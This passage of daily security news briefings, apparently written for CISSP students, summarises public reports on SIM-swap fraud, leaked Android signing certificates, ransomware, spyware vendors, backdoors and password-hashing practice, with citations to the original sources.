"Nicholas Truglia and his associates stole a staggeting amount of cryptocurrency from the victim through a complex SIM swap scheme. Nevertheless, today's sentencing goes to show that no matter how sophisticated the crime is, this Office will continue to successfully prosecute those who choose to defraud others."

SIM swapping, also known as phone number porting, allows an attacker to link a victim's phone number to a new Subscriber Identity Module controlled by the attacker. Once this has been done, mTAN's (mobile transaction authentication numbers) and other messages sent to the victim will be received by the attacker, who can use this to access the victim's accounts.

In this case, the attackers were able to obtain access to the vctim's cryptocurrency wallet, and used Truglia's online account to plunder the victim's wallet, converting the proceeds into Bitcoin and then dividing up the loot. Truglia's share amounted to roughly $US673,000. In addition to his 18 month sentence, Truglia, aged 25, was sentenced to 3 years of supervised release, ordered to forfeit $US983,010.72 and further ordered to pay $US20,379,007 in restitution to the victim within 60 days.

Biase, Nicholas, Florida Man Sentenced To 18 Months For Theft Of Over $20 Million In SIM Swap Scheme, press release, 1 December 2022. Available online at https://www.justice.gov/usao-sdny/pr/florida-man-sentenced-18-months-theft-over-20-million-sim-swap-scheme.

Compromised Android Platform Certificates User to Sign Malware

Malware reverse engineer Łukasz Siewierski has discovered a new exploit against Android mobile devices. Android apps are signed with private keys and validated with the matching certificates. In particular, platform certificates (and their keys) are used - by platform vendors like Samsung, LG and others - to sign the 'android' application on the system image, which runs with a highly privileged user ID, android.uid.system, and holds system permissions including permissions to access user data.

Any other application signed with the same certificate can declare that it wants to run with the same user ID, getting the same level of privileged access.

Now it appears that some platform certificates have been leaked or stolen - as long ago as 2016 - and used to sign malware samples. Searching for the SHA2-256's of some of the samples on VirusTotal shows they are backdoors, loaders and various other exploits which remain undetected by most engines. Fortunately, in the last few days, the various affected platform vendors have rotated their keys and issued updates, and Google has also added detections in the Google Play Store as well as their Build Test Suite.

However, the extent to which these signed malware samples spread in the wild is unknown.

antho...@google.com, Issue 100: Platform certificates used to sign malware, APVI issue, 12 November 2022. Available online at https://bugs.chromium.org/p/apvi/issues/detail?id=100.

Siewierski, Łukasz, New AVPI entry: platform certificates used to sign malware, tweet, 1 December 2022. Available online at https://twitter.com/maldr0id/status/1598068216391405568.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Tags:
 
Les Bell
by Les Bell - Saturday, 3 December 2022, 10:43 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Google Shows Benefits of Memory Safe Languages

Operating systems and high-performance applications (especially for low-powered devices) have traditionally been written in the C and C++ programming languages, which suffer from problems with safe memory management. C, in particular, relies on the programmer correctly matching malloc() (and similar) function calls, which allocate memory blocks, with the corresponding free() calls - something that is particularly tricky in interrupt-driven and multi-threaded code. Forgetting to call free() results in memory leaks and swap file growth, while calling free() more than once on the same pointer will corrupt the heap (or the equivalent structure in the underlying OS). Worse still are use-after-free vulnerabilities - and we haven't yet mentioned buffer overflows, which are probably the most exploited class of vulnerabilities over many decades.

Yet memory-safe languages - Pascal, Ada, Java and others - have been available for decades and only resisted on grounds of efficiency. The most recent and most efficient examples, like Kotlin and Rust, have arrived at a time when processors are so powerful that efficiency is no longer a problem, and so support for Rust is being introduced into the Linux kernel and has already been introduced into the Android mobile OS.

Bar chart showing decline of memory safety vulnerabilities.In a blog post, Google provides statistics that show how the introduction of memory-safe languages into Android has dramatically reduced that class of vulnerability. From 2019 to 2022 the annual number of reported memory safety vulnerabilities has gone from 223 down to just 85. It's no coincidence that 2022's Android 13 is the first release where most new code is in a memory safe language, and that 2022 is the first year where the majority of vulnerabilities do not relate to memory safety.

This is good for security; to date, there have been no memory safety vulnerabilities discovered in Android's Rust code.

Of course, this change is not the only contributor to reducing vulnerabilities in Android; the existing C/C++ is being hardened using a variety of tools, although the fact that most of Andoid's API's are implemented in Java also helps. The Google blog post provides some useful ammunition for developers who want to persuade their shops to migrate to memory-safe languages.

Vander Stoep, Jeffrey, Memory Safe Languages in Android 13, Google Security Blog, 1 December 2022. Available online at https://security.googleblog.com/2022/12/memory-safe-languages-in-android-13.html.

CISA Warns of Cuba Ransomware

The FBI and the US Cybersecurity & Infrastructure Security Agency have issued a joint cybersecurity advisory concerning the increased activities of Cuba ransomware operators. Cuba, which is not associated with the Republic of Cuba, was first observed in 2021, and by mid-2022 its operators had compromised over 100 entities worldwide, demanding over $US145 million in ransom payments, of which $US60 million was paid.

Their primary targets are the financial services, government, healthcare, manufacturing and IT sectors, mostly in the US, and their tactics, techniques and procedures have continued to evolve, exploiting new vulnerabilities for initial compromise and then using a variety of tools for privilege escalation. There also seems to be a link between the Cuba threat actors, the Industrial Spy ransomware and the operators of the RomCom remote access trojan, with the Cuba group selling data exfilatrated by their ransomware via Industrial Spy's online market and also deploying the RomCom RAT.

The CISA advisory provides a complete rundown, including IOC's and MITRE ATT&CK techniques.

Uncredited, #StopRansomware: Cuba Ransomware, cybersecurity advisory alert AAA22-335A, 1 December 2022. Available online at https://www.cisa.gov/uscert/ncas/alerts/aa22-335a.

Android Trojan Steals Facebook Logins

While Android security continues to improve (see above), the mobile OS still has its unfair share of trojaned apps which are being disseminated through the Google Play Store as well as stores which permit side-loaded apps. Zimperium zLabs has documented a long-running Android threat campaign, dubbed the Schoolyard Bully Trojan, which has spread to over 300,000 victims, stealing their Facebook credentials.

Disguised as legitimate educational applications providing books on a range of topics, primarily for Vietnamese readers, these apps are trojaned with a Facebook-specific infostealer, grabbing the victims' email, phone number, password, name and Facebook ID. In many cases, naive users re-use the same password for both Facebook and also for financial accounts, making this campaign even more profitable. Despite the Vietnamese language focus, Zimperium found over 300,000 victims across 71 countries.

The campaign's techniques are also interestinmg - the credential theft is achieved via JavaScript injection; the legitimate Facebook login URL has additional, injected, code which extracts the user's credentials and then sends it to the threat actor's Firebase C2 site. The malware also uses native libraries as an evasion technique, getting past the majority of antivirus products, including those which use machine learning, and it encodes the exfiltrated data to hide it from detection mechanisms.

Gupta, Nipun, Schoolyard Bully Trojan Facebook Credential Stealer, blog post, 1 December 2022. Available online at https://www.zimperium.com/blog/schoolyard-bully-trojan-facebook-credential-stealer/.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Tags:
 
Les Bell
by Les Bell - Friday, 2 December 2022, 8:56 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


LastPass Hit Again

On their web site, LastPass is notifying customers of another security incident which appears to be a follow-up to the previous incident, in August. Back then, an unidentified threat actor was able to gain access to LastPass' development environment, obtaining some source code and technical information. The incident was contained, and no customer data - especially customer password vaults - were accessed.

However, it seems the attackers got something useful. In the latest incident, the firm detected unusual activity within a third-party cloud storage service which is shared by LastPass and its sister company GoTo (GoToMeeting, GoToConnect). Having once again retained the services of Mandiant, the company has determined that an unauthorized party - likely the same threat actor - used information obtained in the earlier breach to gain access to some customer information, although customer passwords will, of course, be encrypted.

It sounds as though cloud access credentials were embeded somewhere in the stolen source - a perennial, and intractable, problem when you need code to access external services. And you can bet that if customer password vaults were stolen, the attackers will be inspecting LastPass' code, looking for implementation flaws in the encryption.

Toubba, Karim, Notice of Recent Security Incident, blog post, 30 November 2022. Available online at https://blog.lastpass.com/2022/11/notice-of-recent-security-incident/.

MD5 Considered Harmful

The Commission Nationale de l'Informatique et des Libertés (the data protection regulator in France) has handed down a decision which should give software developers everywhere pause to consider their code. The regulator fined energy company Électricité de France (EDF) €600,000 over customer privacy issues. Part of the judgement dealt with routine privacy matters such as sending commercial emails, data collection for undefined purposes and unreliable handling of data access and deletion requests.

But the final part dealt specifically with insecure handling of passwords. Generally-accepted good practice says that passwords should be salted and then hashed using a suitably strong digest algorithm - and EDF claimed that it was doing this. However, in reality it was still storing the passwords of over 25,000 customers as unsalted MD5 hashes.

MD5, which produces a 128-bit digest, is deprecated by virtually all regulators and standards authorities (as is SHA-1, which produces a 160-bit digest). But it was the lack of salt that really troubled the French regulator, especially since, while they had now adopted SHA2-512 for later passwords, they still had 2.4 million SHA2-512 unsalted digests. Although EDF had cleaned up their act and were now both salting and hashing correctly, they were still fined.

My advice (and it's what I've taught in university courses): at the very least, make use of language facilities for password salting and hashing, such as PHP's password_hash() and password_verify() functions, which randomly salt a password and hash it with the bcrypt (or optionally, argon2) hash function. Better still, use PBKDF2 (Password-Based Key Derivation Function 2) which will apply a user-specified number of iterations of the chosen hash function, and also incorporates salt. By choosing a large number of iterations, we increase the work factor for both users and attackers - but since users normally only enter their password once, they will barely notice the delay, while attackers trying brute force and dictionary attacks will really be slowed down.

Ducklin, Paul, Serious Security: MD5 considered harmful - to the tune of $600,000, blog post, 30 November 2022. Available online at https://nakedsecurity.sophos.com/2022/11/30/serious-security-md5-considered-harmful-to-the-tune-of-600000/.

New Backdoor Exploits Old Redis Vulnerability

Researchers at cloud security firm Aqua Security have observed a new piece of malware which attempted to exploit one of their honeypots using CVE-2022-0543, a vulnerability in the Redis in-memory database. Redis is widely deployed on web servers, particularly for page caching, although it has many other applications where a high-performance non-relational database is required. CVE-2022-0543 is a vulnerability in the Debian (and Ubuntu) library for the Lua scripting language engine which is a core component of Redis.

By connecting to a vulnerable Redis server, the attacker is able to execute Redis commands which effectively clone a Redis server that contains a shared library, exp_lin.so, which contains the exploit. Once this is loaded, the attacker is able to escape the Lua scripting engine sandbox and execute arbitrary commands - one of which downloads the new malware, named Redigo.

The malware, which as the name suggests is written in the Go programming language, mimics the Redis communications protocol to connect to its C2 server, after which the victim turns into a Redis client with the attacker becoming the server. The commands sent to the infected machine indicate that the goal is to exploit the Redis server itself, rather than the underlying host.

Aqua's report provides a full analysis with IOC's - useful since, being a new malware sample, VirusTotal did not identify Redigo. A bigger question, however, is why new malware is appearing for a vulnerability that was patched back in February - clearly, attackers are still finding victims, which indicates poor vulnerability management processes.

Yaakov, Nitzan and Ofek Itach, Aqua Nautilus Discovers Redigo - New Redis Backdoor Malware, threat alert, 1 December 2022. Available online at https://blog.aquasec.com/redigo-redis-backdoor-malware.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Tags:
 
Les Bell
by Les Bell - Thursday, 1 December 2022, 9:14 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Google Threat Analysis Group Uncovers Commercial Spyware

Google's Threat Analysis Group (TAG) has detailed an exploitation framework which they uncovered when an anonymous submitter disclosed three bugs to the Chrome bug reporting program. The bugs, each accompanied by instructions and a source code archive, are:

  • Heliconia Noise: a web framework for deploying an exploit for a Chrome renderer bug followed by a sandbox escape
  • Heliconia Soft: a web framework which deploys a PDF containing a Windows defender exploit
  • Files: a set of Firefix exploits for Linux and Windows

The vulnerabilities were patched by the respective vendors in 2021 and early 2022, but were likely used as 0days prior to that. The first two exploits end with a launcher DLL that fetches the exploitation agent from a URL and then launches it - they were supplied with a dummy agent called agent_simple and it is likely that, in reality, this will be replaced by a customized agent.

Heliconia Noise includes a pre-commit cleaning script which checks that the produced binaries do not contain sensitive strings, such as the project name, developer names, etc. Ironically, this script leaks all of these, including the name of the company behind this project, Variston IT. Variston Information Technology is a small Barcelona-based company which, it claims, offers "tailor made Information Security Solutions". From these exploits, it seems that Variston has joined the ranks of NSO Group, Cytrox and others in offering commercial spyware.

Lecigne, Clement and Benoit Sevens, New details on commercial spyware vendor Variston, blog post, 30 November 2022. Available online at https://blog.google/threat-analysis-group/new-details-on-commercial-spyware-vendor-variston/.

North Korean Backdoor Uses Google Drive for C2

ESET researchers have reported on a newly-analyzed backdoor called Dolphin, deployed by North Korean group APT37 (ScarCruft, Reaper) against targets in South Korea. First detected in early 2021, Dolphin was used in a watering-hole attack on a South Korean online newspaper, in that case being deployed as the final stage of the attack via an Internet Explorer exploit and some shellcode which loaded another APT37 backdoor called BLUELIGHT. Most attacks ended with BLUELIGHT, but ESET discovered that, on selected targets, BLUELIGHT was then used to download and chain to Dolphin.

While BLUELIGHT can exfiltrate selected files upon command, Dolphin extends this capability to active searching of drives and the exfiltration of files with extensions of interest. Backdoor initially reports some basic information about the victim system (name, username, OS version, local and external IP addresses, installed security products, check for debugger and other tools such as Wireshark) and then downloads commands, issued by its operators, from Google Drive storage, executing them and uploading the results.

Dolphin's commands give it extensive capabilities apart from file exfiltration. It can also search connected portable devices such as smartphones, using the Windows Portable Device API, perform screenshots and keylogging, download and execute shellcode, run aribtrary shell commands and perform credential stealing. Another interesting trick found in some versions is to downgrade the security of a user's Google account, by enabling IMAP access to GMail and then enabling "less secure app access", presumably to backdoor the Google account.

The ESET report provides a full analysis of the evolution of Dolphin, as well as MITRE ATT&CK techniques and IOC's.

Jurčacko , Filip, Who's swimming in South Korean waters? Meet ScarCruft's Dolphin, blog post, 30 November 2022. Available online at https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/.

China-related Cyberespionage Campaign Targets Philippines - Also SE Asia, Asia-Pacific, US and Europe

Mandiant Managed Defense has lifted the lid on a cyberespionage campaign being run in the Philippines by a Chinese nexus group tracked as UNC4191. Although the campaign leveraged USB devices to infect machines in the Philippines, the targeted organizations were based in other locations around the world.

After initial infection via the USB's, the threat actor used legitimately-signed binaries to side-load malware, including three new families Mandiant named MISTCLOAK, DARKDEW and BLUEHAZE. This would lead to deployment of a renamed NCAT binary which created a reverse shell on the victim's system, gaining the thread actor backdoor access. The malware would also replicate itself by infecting any new USB drives plugged into the system.

Timestamps in binaries date back to September 2021, indicating that this campaign may have been running for some time, especially considering the self-propagating nature of the malware. The range of both public- and private-sector entities targeted suggest that the campaign objective is collection of intelligence related to China's political and commercial interests.

The Mandiant report provides a full analysis, including YARA rules and IOC's.

Tomcik, Ryan, John Wolfram, Tommy Dacanay and Geoff Ackerman, Always Another Secret: Lifting the Haze on China-nexus Espionage in Southeast Asia, blog post, 28 November 2022. Available online at https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Tags: